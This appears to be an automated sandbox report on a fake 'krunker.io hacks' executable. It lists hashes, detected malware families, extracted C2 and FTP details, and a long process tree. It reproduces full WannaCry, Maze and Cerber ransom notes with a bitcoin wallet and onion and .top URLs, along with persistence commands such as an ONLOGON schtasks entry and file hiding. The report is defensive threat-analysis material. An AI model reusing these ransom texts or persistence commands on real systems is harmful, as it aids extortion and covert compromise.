Resubmissions

16-04-2024 14:39

240416-r1ca1ace39 10

11-04-2024 14:24

240411-rq7zxsgd9y 10

11-04-2024 14:23

240411-rqctsagd71 10

Analysis

  • max time kernel
    282s
  • max time network
    285s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240412-en
  • resource tags

    arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    16-04-2024 14:39

Errors

Reason
Machine shutdown

General

  • Target

    krunker.iohacks.exe

  • Size

    30.9MB

  • MD5

    2850f1cb75953d9e0232344f6a13bf48

  • SHA1

    141ab8929fbe01031ab1e559d880440ae931cc16

  • SHA256

    892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba

  • SHA512

    25551eb0fbca013bcebd514eb72185e157a07f116a6973bfe4b728febcefc7044a816c5c70048c3fda2eeb4ce53b52bd7b19ef1ef851a0f4fc90451e60540d6d

  • SSDEEP

    786432:j8Zic+QKJObt2u8xQYcLpoTEjoAsM0D0EHShV/:j8YQzB8xQzLp+nAV0BK

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    files.000webhost.com
  • Port:
    21
  • Username:
    fcb-aws-host-4

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Extracted

Path

C:\PerfLogs\DECRYPT-FILES.txt

Family

maze

Ransom Note
Attention! ---------------------------- | What happened? ---------------------------- We hacked your network and now all your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms. You cannot access the files right now. But do not worry. You can get it back! It is easy to recover in a few steps. We have also downloaded a lot of private data from your network, so in case of not contacting us as soon as possible this data will be released. If you do not contact us in a 3 days we will post information about your breach on our public news website and after 7 days the whole downloaded info. To see what happens to those who don't contact us, google: * Southwire Maze Ransomware * MDLab Maze Ransomware * City of Pensacola Maze Ransomware After the payment the data will be removed from our disks and decryptor will be given to you, so you can restore all your files. ---------------------------- | How to contact us and get my files back? ---------------------------- The only method to restore your files and be safe from data leakage is to purchase a unique for you private key which is securely stored on our servers. To contact us and purchase the key you have to visit our website in a hidden TOR network. There are general 2 ways to reach us: 1) [Recommended] Using hidden TOR network. a) Download a special TOR browser: https://www.torproject.org/ b) Install the TOR Browser. c) Open the TOR Browser. d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/6c490cc532514173 e) Follow the instructions on this page. 2) If you have any problems connecting or using TOR network a) Open our website: https://mazedecrypt.top/6c490cc532514173 b) Follow the instructions on this page. Warning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. On this page, you will see instructions on how to make a free decryption test and how to pay. Also it has a live chat with our operators and support team. ---------------------------- | What about guarantees? ---------------------------- We understand your stress and worry. So you have a FREE opportunity to test a service by instantly decrypting for free three files from every system in your network. If you have any problems our friendly support team is always here to assist you in a live chat! P.S. Dear system administrators, do not think you can handle it by yourself. Inform leadership as soon as possible. By hiding the fact of the breach you will be eventually fired and sometimes even sued. ------------------------------------------------------------------------------- THIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU ---BEGIN MAZE KEY--- mGmNmjTcX55XWYCKxA5ip1abYQnEkw/io0i/Sw79h46XBYcWs9VQoOeBt8GenR/P87gd/mtwOAEH15ziot9ol3a6eGmkVpLTmTIuvwXjfdGvhAP88HRbbrYgFAyHotXEhm9lP9EhNVWp949GuJ4bUTJKw3xBXQ4Gg6LxP1KvmNLT8uIvf4emu/ZvjZK3bDWOIDVXuEyxQeFO51y0cdghMrdV9YPSwcPsuhw1/n9Dlf+3o/v+JeFrfxzxLz/dieaKpUlPhUX/z+f16WjtzHWwLopA43CpyAJx8iyHd9MvKzr/Fz6W0x/Btf+Dwt5IZUgDOmrzHXnD13GeqpjJpZVHT8Dsaj+R4ODEWnqU8iR2dXLLFVHoiCmcu7lTN8sKsfzpk93oc60BKxM8nR/TL648VW+U3Yqze/3vNg/6Pwg7muyJ63kIT/TkqMSgx0fe1wltrECm35Wd0eZCVu2EX/QRHstH4hjtBLmflEBGOIdJ8QgoWwGYKyis+AxrTp0e4T0gZhD9uesC9nY6PZ68VbP/raQAFDisCSyJVMQv6R1S/3HLlxXQSBzNR8WHIuDPwcuTrAo6ISIjteaZcWYC43md9eS0s338qpriLjPpXTLYgRLy4EOg8tF0IUIgv7bGd16gpuCAcdD3UzFcQoZFAfYK7h1/K/y1jH55uvPRQAMZILnL28y2n3m4CGHFyztkNw+Gj5YTySs8ODInqoSgnKMQzCHpS/nTzP1B2A5EslmL5cY229FiC6pc2IgrxNz8nYm2cQVbOmN81GDtyG8gqjbfONZg+phGWI5gMsejz906Z9EpnFiE1xtRsjcPi9X6CUdWm6awW9ixPIpKIv3aaTcAcb1tSzRDKjUqQ1ng0yzjPooFNYG9jweZUG5gNJRlc0KT4tyCTIOfaRmIOwd2x8XsOaSwU/jiS11Rg9CF0/GH7QmZTFuoJPS34Z5phXqJLn9TARpIkPYJBpYT8010uh1Q/AHDj/EGqjRgIIbPFV1f7jlQ9JYsE6opHmVUmY8AbUMV/zYeQ4QHLXEHRMztxZ5/lhwBQtJeGM1WoBgsCkf18Gk6CSj1LcikinGpLYvdVsvLi6RpCOtYdRzYX0aBA+/uR7puOlFCKcnf9FQw16u7OcZiwxkYBLHgDhqsHQvb5AizAq66xTmTJ80GKsSmYeXdvGCGtqll9KWWATKHUhskGU06Ma24c3DESx39B9+0Vp57wKzdcQlGG74mH83r+322FvalutvIAZQFev+ANUaVN5I8pNKa6I3URoLTpsnFW9Uw5uH4zjbBhvNCBpcSm0PGPxkiTxRi3OM3dKoSC52e1fAVA6b+IWknOzL+0TUz9dtQlpzaEx4qHNajh4LVTZJq0DMEl94HAQZwAmfcxFiLOB6Psspv4v0/TgwaeNfY0etwV3lgq1EIeT7ncvv9pil34bm95albhFwqo4al1wnvCnhiqVTEGOaDFwPrs3xqHfL9P6xqki4g7LDCgs8JNvlb/ps6g/E5bzeDcUqyleGRTfqk10aP+ElkDSSs1nz8f5n7aRykDu53Hl+Xl0NO0AZ7HpK9L4+Vx+8IqWqTtxOb3lyP/eqHwKMGFuh5yqbr9G8198v4i4JdKZC2Qq1JKy80dfhA3dStKUr7GxdIzVxoHoFn4ITvz6FguGHCAYVnRd2p6BF2t9hbItO0QHW6II+1+tjUXODWoU8esYmytSf+XDdqvnq7YLt9VHktSjd8m6gsDAIs0+5jksH1kmaq4gQigRBMnXzXvux0HuvOPQ1JSptZ0zrv4CLD38zb0ZOI3WmDw8mDd4yf6B3VqMpWZNOKSXe4H1FKZYX25FDtYsKh71ve+xTqxGKBpagBgk+2dil6A8fniO3yQxc23hfsRkV204yv/1zEiHPgcod4EH92voKM1uht++yvRP3AeMF2QWOAklR6VXcUknN7llnwk3Lo6UtQklKRl5IaZ1ghEpZJYYx2JsZYZ/Ehug4tzPCds3hPlrJycaXtWZBTt8lA8/0uOkmk4uH02rLOE/gGnaIc6euiTjFUk71rAaieNOiXnQBp+wlzaZyviMGlP6Sal2juh7l2kN+FdLXzbJdhDWHzuIVa3HnAwq+gy1xGp/J6P/4VEjVGNY+OUM936oSD5Ztbd4yW5jcZmjj20oN2orHWXjsFl/msIFWqBAx8K0awDq5V5pPr3b6/f7i4bdAfKwI86SPX7xIblUKe+R60d1rrSwNbooaFriCk/jXqNsn5zDVapWXacQoiNgBjADQAOQAwAGMAYwA1ADMAMgA1ADEANAAxADcAMwAAABCAYBoMQQBkAG0AaQBuAAAAIiZXAE8AUgBLAEcAUgBPAFUAUABcAEYAUABWAEwARgBWAFUATAAAACoMbgBvAG4AZQB8AAAAMixXAGkAbgBkAG8AdwBzACAAMQAwACAARQBuAHQAZQByAHAAcgBpAHMAZQAAADoofABkAGUAcAByAGUAYwBhAHQAZQBkACAAPgAgAHYAMgAuADMAfAAAAEJWfABDAF8ARgBfADIAMAAzADUAMgAvADIANAAxADMANgAxAHwARABfAFUAXwAwAC8AMAB8AEYAXwBGAF8AMgAwADQAMgAwAC8AMgAwADQANwA5AHwAAABIAFBAWIkIYIkIaIkIcNGt3nJ4DIABAYoBBTIuMy4x ---END MAZE KEY---
URLs

http://aoacugmutagkwctu.onion/6c490cc532514173

https://mazedecrypt.top/6c490cc532514173

Extracted

Path

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\_R_E_A_D___T_H_I_S___989MCED_.txt

Family

cerber

Ransom Note
Hi, I'am CRBR ENCRYPTOR ;) ----- ALL YOUR DOCUMENTS, PH0T0S, DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ----- The only one way to decrypt your files is to receive the private key and decryption program. To receive the private key and decryption program go to any decrypted folder, inside there is the special file (*_R_E_A_D___T_H_I_S_*) with complete instructions how to decrypt your files. If you cannot find any (*_R_E_A_D___T_H_I_S_*) file at your PC, follow the instructions below: ----- 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://xpcx6erilkjced3j.onion/26B3-8D93-8FD6-0098-B030 Note! This page is available via "Tor Browser" only. ----- Also you can use temporary addresses on your personal page without using "Tor Browser". ----- 1. http://xpcx6erilkjced3j.1n5mod.top/26B3-8D93-8FD6-0098-B030 2. http://xpcx6erilkjced3j.19kdeh.top/26B3-8D93-8FD6-0098-B030 3. http://xpcx6erilkjced3j.1mpsnr.top/26B3-8D93-8FD6-0098-B030 4. http://xpcx6erilkjced3j.18ey8e.top/26B3-8D93-8FD6-0098-B030 5. http://xpcx6erilkjced3j.17gcun.top/26B3-8D93-8FD6-0098-B030 ----- Note! These are temporary addresses! They will be available for a limited amount of time! -----
URLs

http://xpcx6erilkjced3j.onion/26B3-8D93-8FD6-0098-B030

http://xpcx6erilkjced3j.1n5mod.top/26B3-8D93-8FD6-0098-B030

http://xpcx6erilkjced3j.19kdeh.top/26B3-8D93-8FD6-0098-B030

http://xpcx6erilkjced3j.1mpsnr.top/26B3-8D93-8FD6-0098-B030

http://xpcx6erilkjced3j.18ey8e.top/26B3-8D93-8FD6-0098-B030

http://xpcx6erilkjced3j.17gcun.top/26B3-8D93-8FD6-0098-B030

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Cerber

    Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

  • DcRat 36 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect Neshta payload 11 IoCs
  • Detect ZGRat V1 6 IoCs
  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • Maze

    Ransomware family also known as ChaCha.

  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Process spawned unexpected child process 30 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Ramnit

    Ramnit is a versatile family that holds viruses, worms, and Trojans.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 7 IoCs
  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

  • UAC bypass 3 TTPs 10 IoCs
  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Windows security bypass 2 TTPs 2 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • DCRat payload 2 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • Nirsoft 1 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Contacts a large (1167) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 3 IoCs
  • Office macro that triggers on suspicious action 1 IoCs

    Office document macro which triggers in special circumstances - often malicious.

  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 12 IoCs
  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 4 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 8 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Uses the VBS compiler for execution 1 TTPs
  • Windows security modification 2 TTPs 3 IoCs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 20 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 10 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Checks system information in the registry 2 TTPs 8 IoCs

    System information is often read in order to detect sandboxing environments.

  • Drops autorun.inf file 1 TTPs 4 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 46 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 35 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 32 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 36 IoCs
  • Suspicious use of SetWindowsHookEx 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 13 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 4 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe
    "C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2928
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4896
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
        "4363463463464363463463463.exe"
        3⤵
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:3900
        • C:\Windows\svchost.com
          "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ama.exe"
          4⤵
          • Executes dropped EXE
          • Drops file in Windows directory
          PID:3444
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ama.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ama.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of FindShellTrayWindow
            PID:4496
        • C:\Windows\svchost.com
          "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\swiiiii.exe"
          4⤵
          • Executes dropped EXE
          PID:784
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\swiiiii.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\swiiiii.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:5720
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              6⤵
                PID:3144
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:5652
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 868
                6⤵
                • Program crash
                PID:5360
          • C:\Windows\svchost.com
            "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\dais123.exe"
            4⤵
            • Executes dropped EXE
            PID:5424
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\dais123.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\dais123.exe
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:4592
          • C:\Windows\svchost.com
            "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pclient.exe"
            4⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            PID:6012
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pclient.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pclient.exe
              5⤵
              • Executes dropped EXE
              • Accesses Microsoft Outlook profiles
              • Suspicious behavior: EnumeratesProcesses
              • outlook_office_path
              • outlook_win_path
              PID:6008
          • C:\Windows\svchost.com
            "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CLIENT~1.EXE"
            4⤵
            • Executes dropped EXE
            PID:3228
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CLIENT~1.EXE
              C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CLIENT~1.EXE
              5⤵
              • Executes dropped EXE
              PID:6012
              • C:\Windows\SYSTEM32\schtasks.exe
                "schtasks" /create /tn "Windows System" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                6⤵
                • DcRat
                • Creates scheduled task(s)
                PID:5744
              • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                PID:4992
                • C:\Windows\SYSTEM32\schtasks.exe
                  "schtasks" /create /tn "Windows System" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                  7⤵
                  • DcRat
                  • Creates scheduled task(s)
                  PID:2156
          • C:\Windows\svchost.com
            "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\afile.exe"
            4⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            PID:5724
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\afile.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\afile.exe
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:5448
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                  PID:300
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  6⤵
                  • Modifies registry class
                  PID:4488
                  • C:\Windows\svchost.com
                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\newss.exe"
                    7⤵
                    • Drops file in Program Files directory
                    • Drops file in Windows directory
                    PID:4936
                    • C:\Users\Admin\AppData\Roaming\CONFIG~1\newss.exe
                      C:\Users\Admin\AppData\Roaming\CONFIG~1\newss.exe
                      8⤵
                        PID:5532
                    • C:\Windows\svchost.com
                      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\traffic.exe"
                      7⤵
                      • Drops file in Windows directory
                      PID:2188
                      • C:\Users\Admin\AppData\Roaming\CONFIG~1\traffic.exe
                        C:\Users\Admin\AppData\Roaming\CONFIG~1\traffic.exe
                        8⤵
                          PID:5248
                • C:\Windows\svchost.com
                  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\REDLIN~1.EXE"
                  4⤵
                    PID:4360
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\REDLIN~1.EXE
                      C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\REDLIN~1.EXE
                      5⤵
                        PID:1596
                    • C:\Windows\svchost.com
                      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\virus.exe"
                      4⤵
                        PID:3080
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\virus.exe
                          C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\virus.exe
                          5⤵
                            PID:3172
                        • C:\Windows\svchost.com
                          "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\amert.exe"
                          4⤵
                          • Drops file in Windows directory
                          PID:5440
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\amert.exe
                            C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\amert.exe
                            5⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3884
                        • C:\Windows\svchost.com
                          "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\dvchost.exe"
                          4⤵
                            PID:5524
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\dvchost.exe
                              C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\dvchost.exe
                              5⤵
                                PID:5368
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                                  6⤵
                                    PID:1292
                                    • C:\Windows\system32\mode.com
                                      mode 65,10
                                      7⤵
                                        PID:4080
                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                        7z.exe e file.zip -p1979614625696244291525413362 -oextracted
                                        7⤵
                                        • Loads dropped DLL
                                        PID:3220
                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                        7z.exe e extracted/file_3.zip -oextracted
                                        7⤵
                                        • Loads dropped DLL
                                        PID:5972
                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                        7z.exe e extracted/file_2.zip -oextracted
                                        7⤵
                                        • Loads dropped DLL
                                        PID:4352
                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                        7z.exe e extracted/file_1.zip -oextracted
                                        7⤵
                                        • Loads dropped DLL
                                        PID:4032
                                      • C:\Windows\system32\attrib.exe
                                        attrib +H "winhostDhcp.exe"
                                        7⤵
                                        • Views/modifies file attributes
                                        PID:6056
                                      • C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe
                                        "winhostDhcp.exe"
                                        7⤵
                                        • Drops file in Program Files directory
                                        • Modifies registry class
                                        PID:5288
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xfQvgQCtkG.bat"
                                          8⤵
                                            PID:6284
                                            • C:\Windows\system32\chcp.com
                                              chcp 65001
                                              9⤵
                                                PID:6408
                                              • C:\Windows\system32\w32tm.exe
                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                9⤵
                                                  PID:6420
                                                • C:\Windows\Fonts\OfficeClickToRun.exe
                                                  "C:\Windows\Fonts\OfficeClickToRun.exe"
                                                  9⤵
                                                  • Modifies registry class
                                                  PID:5516
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LsjJJiW2rn.bat"
                                                    10⤵
                                                      PID:3564
                                                      • C:\Windows\system32\chcp.com
                                                        chcp 65001
                                                        11⤵
                                                          PID:2280
                                                        • C:\Windows\system32\w32tm.exe
                                                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          11⤵
                                                            PID:4896
                                                          • C:\Windows\Fonts\OfficeClickToRun.exe
                                                            "C:\Windows\Fonts\OfficeClickToRun.exe"
                                                            11⤵
                                                            • Modifies registry class
                                                            PID:1216
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6gfTO1Diev.bat"
                                                              12⤵
                                                                PID:4524
                                                                • C:\Windows\system32\chcp.com
                                                                  chcp 65001
                                                                  13⤵
                                                                    PID:6392
                                                                  • C:\Windows\system32\w32tm.exe
                                                                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                    13⤵
                                                                      PID:6764
                                                                    • C:\Windows\Fonts\OfficeClickToRun.exe
                                                                      "C:\Windows\Fonts\OfficeClickToRun.exe"
                                                                      13⤵
                                                                      • Modifies registry class
                                                                      PID:6332
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\re37XjgnVO.bat"
                                                                        14⤵
                                                                          PID:5036
                                                                          • C:\Windows\system32\chcp.com
                                                                            chcp 65001
                                                                            15⤵
                                                                              PID:6580
                                                                            • C:\Windows\system32\PING.EXE
                                                                              ping -n 10 localhost
                                                                              15⤵
                                                                              • Runs ping.exe
                                                                              PID:3820
                                                                            • C:\Windows\Fonts\OfficeClickToRun.exe
                                                                              "C:\Windows\Fonts\OfficeClickToRun.exe"
                                                                              15⤵
                                                                              • Modifies registry class
                                                                              PID:1408
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\PdP1UB7pUq.bat"
                                                                                16⤵
                                                                                  PID:4704
                                                                                  • C:\Windows\system32\chcp.com
                                                                                    chcp 65001
                                                                                    17⤵
                                                                                      PID:1920
                                                                                    • C:\Windows\system32\PING.EXE
                                                                                      ping -n 10 localhost
                                                                                      17⤵
                                                                                      • Runs ping.exe
                                                                                      PID:2232
                                                                                    • C:\Windows\Fonts\OfficeClickToRun.exe
                                                                                      "C:\Windows\Fonts\OfficeClickToRun.exe"
                                                                                      17⤵
                                                                                      • Modifies registry class
                                                                                      PID:5724
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9LyY97a2AO.bat"
                                                                                        18⤵
                                                                                          PID:6504
                                                                                          • C:\Windows\system32\chcp.com
                                                                                            chcp 65001
                                                                                            19⤵
                                                                                              PID:1536
                                                                                            • C:\Windows\system32\PING.EXE
                                                                                              ping -n 10 localhost
                                                                                              19⤵
                                                                                              • Runs ping.exe
                                                                                              PID:1904
                                                                                            • C:\Windows\Fonts\OfficeClickToRun.exe
                                                                                              "C:\Windows\Fonts\OfficeClickToRun.exe"
                                                                                              19⤵
                                                                                              • Modifies registry class
                                                                                              PID:3872
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OTvWQnNRQU.bat"
                                                                                                20⤵
